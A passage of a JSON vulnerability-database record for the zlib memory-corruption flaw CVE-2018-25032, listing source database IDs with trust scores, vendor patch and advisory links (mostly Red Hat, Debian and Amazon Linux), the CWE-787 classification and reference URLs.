"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022072010",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022060505",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022042114",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022051324",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022060127",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022061722",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022070735",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022053131",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022060816",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022053025",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022070643",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022051742",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022040111",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022051235",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022062931",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022070507",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022040603",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "166856",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2221",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "167271",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "167265",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "166552",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167133",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166967",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167381",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167122",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171157",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167225",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167140",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167277",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167330",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167485",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167334",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167116",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167389",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "166555",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167223",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "168036",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167134",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167364",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167594",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171152",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167188",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167936",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167138",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167586",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167186",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167470",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167119",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167136",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167674",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "167124",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-418557",
"trust": 0.1
},
{
"db": "ICS CERT",
"id": "ICSA-23-348-10",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-25032",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "171159",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-418557"
},
{
"db": "VULMON",
"id": "CVE-2018-25032"
},
{
"db": "PACKETSTORM",
"id": "167622"
},
{
"db": "PACKETSTORM",
"id": "167271"
},
{
"db": "PACKETSTORM",
"id": "169897"
},
{
"db": "PACKETSTORM",
"id": "171159"
},
{
"db": "PACKETSTORM",
"id": "169782"
},
{
"db": "PACKETSTORM",
"id": "167346"
},
{
"db": "PACKETSTORM",
"id": "167265"
},
{
"db": "PACKETSTORM",
"id": "167679"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2221"
},
{
"db": "NVD",
"id": "CVE-2018-25032"
}
]
},
"id": "VAR-202203-1690",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-418557"
}
],
"trust": 0.6566514
},
"last_update_date": "2026-03-09T20:35:07.026000Z",
"patch": {
"_id": null,
"data": [
{
"title": "zlib Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=187366"
},
{
"title": "Debian Security Advisories: DSA-5111-1 zlib -- security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=1953a09ed6b6acb885ad5f0bc5c6a1cb"
},
{
"title": "Debian CVElist Bug Report Logs: CVE-2018-25032: zlib memory corruption on deflate",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=aa0fc3d1bfe74e5ba24eb36e6014b06b"
},
{
"title": "Amazon Linux AMI: ALAS-2022-1602",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2022-1602"
},
{
"title": "Amazon Linux AMI: ALAS-2022-1640",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami\u0026qid=ALAS-2022-1640"
},
{
"title": "Amazon Linux 2: ALAS2-2022-1772",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=ALAS2-2022-1772"
},
{
"title": "Amazon Linux 2022: ALAS2022-2022-159",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-159"
},
{
"title": "Amazon Linux 2022: ALAS2022-2022-100",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-100"
},
{
"title": "Red Hat: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=CVE-2018-25032"
},
{
"title": "Red Hat: Important: zlib security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224845 - Security Advisory"
},
{
"title": "Red Hat: Important: zlib security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221642 - Security Advisory"
},
{
"title": "Red Hat: Important: zlib security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221591 - Security Advisory"
},
{
"title": "Red Hat: Important: rsync security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222197 - Security Advisory"
},
{
"title": "Red Hat: Important: rsync security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222192 - Security Advisory"
},
{
"title": "Red Hat: Important: mingw-zlib security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20227813 - Security Advisory"
},
{
"title": "Red Hat: Important: rsync security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224592 - Security Advisory"
},
{
"title": "Red Hat: Important: zlib security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20230976 - Security Advisory"
},
{
"title": "Red Hat: Important: zlib security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222214 - Security Advisory"
},
{
"title": "Red Hat: Important: zlib security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222213 - Security Advisory"
},
{
"title": "Red Hat: Important: rsync security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222201 - Security Advisory"
},
{
"title": "Red Hat: Important: rsync security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222198 - Security Advisory"
},
{
"title": "Red Hat: Important: zlib security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221661 - Security Advisory"
},
{
"title": "Red Hat: Important: zlib security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224584 - Security Advisory"
},
{
"title": "Red Hat: Important: zlib security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20230943 - Security Advisory"
},
{
"title": "Red Hat: Important: mingw-zlib security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20228420 - Security Advisory"
},
{
"title": "Arch Linux Issues: ",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues\u0026qid=CVE-2018-25032"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 4.9.35 bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222283 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 4.6.58 bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222264 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 4.7.51 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222268 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 4.6.58 security and extras update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222265 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Virtualization 4.10.2 Images security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225026 - Security Advisory"
},
{
"title": "Red Hat: Important: RHV-H security update (redhat-virtualization-host) 4.3.23",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225439 - Security Advisory"
},
{
"title": "Amazon Linux 2022: ALAS2022-2022-158",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2022\u0026qid=ALAS2022-2022-158"
},
{
"title": "Red Hat: Moderate: Cryostat 2.1.1: new Cryostat on RHEL 8 container images",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224985 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225152 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225187 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225192 - Security Advisory"
},
{
"title": "Brocade Security Advisories: Access Denied",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=brocade_security_advisories\u0026qid=ac82ca9e02281afb3f0356588beedb43"
},
{
"title": "Red Hat: Moderate: Release of OpenShift Serverless Version 1.22.1",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224863 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Release of containers for OSP 16.2.z director operator tech preview",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222183 - Security Advisory"
},
{
"title": "Red Hat: Important: OpenShift Virtualization 4.8.7 Images bug fixes and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226890 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224691 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 4.8.41 bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222272 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224671 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224692 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Cryostat 2.1.0: new Cryostat on RHEL 8 container images",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221679 - Security Advisory"
},
{
"title": "Red Hat: Moderate: security update for rh-sso-7/sso75-openshift-rhel8 container image",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221713 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Secondary Scheduler Operator for Red Hat OpenShift 1.0.1 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225699 - Security Advisory"
},
{
"title": "Red Hat: Important: RHACS 3.69 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225188 - Security Advisory"
},
{
"title": "Red Hat: Moderate: ACS 3.70 enhancement and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224880 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 3.11.705 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222281 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift GitOps security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224690 - Security Advisory"
},
{
"title": "Red Hat: Important: RHACS 3.68 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225132 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.3.10 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221715 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat OpenShift Logging Security and Bug update Release 5.4.1",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222216 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Openshift Logging Security and Bug update Release (5.2.10)",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222218 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat OpenShift Logging Security and Bug update Release 5.3.7",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20222217 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.4.4 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221681 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift Service Mesh 2.1.3 Containers security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225006 - Security Advisory"
},
{
"title": "Red Hat: Low: Release of OpenShift Serverless Version 1.22.0",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20221747 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Migration Toolkit for Containers (MTC) 1.7.3 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225840 - Security Advisory"
},
{
"title": "Apple: macOS Monterey 12.4",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=apple_security_advisories\u0026qid=73857ee26a600b1527481f1deacc0619"
},
{
"title": "Red Hat: Moderate: Migration Toolkit for Containers (MTC) 1.6.5 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20224814 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Migration Toolkit for Containers (MTC) 1.7.2 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225483 - Security Advisory"
},
{
"title": "Red Hat: Moderate: OpenShift Container Platform 4.11.0 extras and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225070 - Security Advisory"
},
{
"title": "Red Hat: Important: OpenShift Virtualization 4.11.0 Images security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226526 - Security Advisory"
},
{
"title": "Red Hat: Important: Migration Toolkit for Containers (MTC) 1.7.4 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20226429 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.4.5 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225201 - Security Advisory"
},
{
"title": "Red Hat: Moderate: Red Hat Advanced Cluster Management 2.3.11 security updates and bug fixes",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225392 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat OpenShift Data Foundation 4.13.0 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20233742 - Security Advisory"
},
{
"title": "Red Hat: Important: Service Telemetry Framework 1.4 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225924 - Security Advisory"
},
{
"title": "Red Hat: Important: OpenShift Container Platform 4.11.0 bug fix and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20225069 - Security Advisory"
},
{
"title": "SSZipArchive",
"trust": 0.1,
"url": "https://github.com/ZipArchive/ZipArchive "
},
{
"title": "UnityReleaseNotes",
"trust": 0.1,
"url": "https://github.com/mario206/UnityReleaseNotes "
},
{
"title": "zlib-patch-demo",
"trust": 0.1,
"url": "https://github.com/chainguard-dev/zlib-patch-demo "
},
{
"title": "ReptileIndexOfProject",
"trust": 0.1,
"url": "https://github.com/Webb-L/reptileIndexOfProject "
},
{
"title": "UnityReleaseNotes",
"trust": 0.1,
"url": "https://github.com/mario206/UnityReleaseNotes-latest "
},
{
"title": "snyk-to-cve",
"trust": 0.1,
"url": "https://github.com/yeforriak/snyk-to-cve "
},
{
"title": "GitHub Actions CI App Pipeline",
"trust": 0.1,
"url": "https://github.com/isgo-golgo13/gokit-gorillakit-enginesvc "
},
{
"title": "veracode-container-security-finding-parser",
"trust": 0.1,
"url": "https://github.com/vincent-deng/veracode-container-security-finding-parser "
},
{
"title": "The Register",
"trust": 0.1,
"url": "https://www.theregister.co.uk/2022/03/30/zlib_data_bug/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-25032"
},
{
"db": "CNNVD",
"id": "CNNVD-202203-2221"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-787",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-418557"
},
{
"db": "NVD",
"id": "CVE-2018-25032"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 1.9,
"url": "https://www.debian.org/security/2022/dsa-5111"
},
{
"trust": 1.8,
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf"
},
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20220729-0004/"
},
{
"trust": 1.8,
"url": "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12"
},
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20220526-0009/"
},
{
"trust": 1.8,
"url": "https://support.apple.com/kb/ht213255"
},
{
"trust": 1.8,
"url": "https://support.apple.com/kb/ht213256"
},
{
"trust": 1.8,
"url": "https://support.apple.com/kb/ht213257"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2022/may/38"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2022/may/35"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2022/may/33"
},
{
"trust": 1.8,
"url": "https://security.gentoo.org/glsa/202210-42"
},
{
"trust": 1.8,
"url": "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531"
},
{
"trust": 1.8,
"url": "https://github.com/madler/zlib/issues/605"
},
{
"trust": 1.8,
"url": "https://www.openwall.com/lists/oss-security/2022/03/24/1"
},
{
"trust": 1.8,
"url": "https://www.openwall.com/lists/oss-security/2022/03/28/1"
},
{
"trust": 1.8,
"url": "https://www.openwall.com/lists/oss-security/2022/03/28/3"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujul2022.html"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html"
},
{
"trust": 1.8,
"url": "http://www.openwall.com/lists/oss-security/2022/03/25/2"
},
{
"trust": 1.8,
"url": "http://www.openwall.com/lists/oss-security/2022/03/26/1"
},
{
"trust": 1.4,
"url": "https://access.redhat.com/security/cve/cve-2018-25032"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ns2d2gfpfgojul4wq3duay7hf4vwq77f/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/xokfmsnq5d5wgmalbnbxu3ge442v74wu/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/voknp2l734ael47nrygvzikefoubqy5y/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/df62mvmh3qugmbdcb3dy2erq6ebhtadb/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/jzzptwryqulaol3aw7rzjnvz2uonxcv4/"
},
{
"trust": 1.1,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/dczfijbjtz7cl5qxbfktq22q26vinruf/"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.8,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.8,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25032"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/voknp2l734ael47nrygvzikefoubqy5y/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/jzzptwryqulaol3aw7rzjnvz2uonxcv4/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ns2d2gfpfgojul4wq3duay7hf4vwq77f/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/df62mvmh3qugmbdcb3dy2erq6ebhtadb/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/dczfijbjtz7cl5qxbfktq22q26vinruf/"
},
{
"trust": 0.7,
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/xokfmsnq5d5wgmalbnbxu3ge442v74wu/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2900"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168011/red-hat-security-advisory-2022-5924-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168696/red-hat-security-advisory-2022-6890-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2709"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060127"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169897/red-hat-security-advisory-2022-8420-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167281/red-hat-security-advisory-2022-2265-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.5062"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.6112"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2474"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022070643"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022051742"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2598"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1403"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/168352/red-hat-security-advisory-2022-6429-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167602/red-hat-security-advisory-2022-5201-01.html"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.1366"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022051703"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169624/gentoo-linux-security-advisory-202210-42.html"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2018-25032/"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/169782/red-hat-security-advisory-2022-7813-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022040111"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167327/red-hat-security-advisory-2022-2281-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060816"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2023.1695"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3050"
},
{
"trust": 0.6,
"url": "https://support.apple.com/en-us/ht213255"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022053131"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022033020"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/166856/red-hat-security-advisory-2022-1591-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022070735"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.2561"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2022.3299"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167008/red-hat-security-advisory-2022-1747-01.html"
},
{
"trust": 0.6,
"url": "https://packetstormsecurity.com/files/167679/red-hat-security-advisory-2022-5483-01.html"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022051235"
},
{
"trust": 0.6,
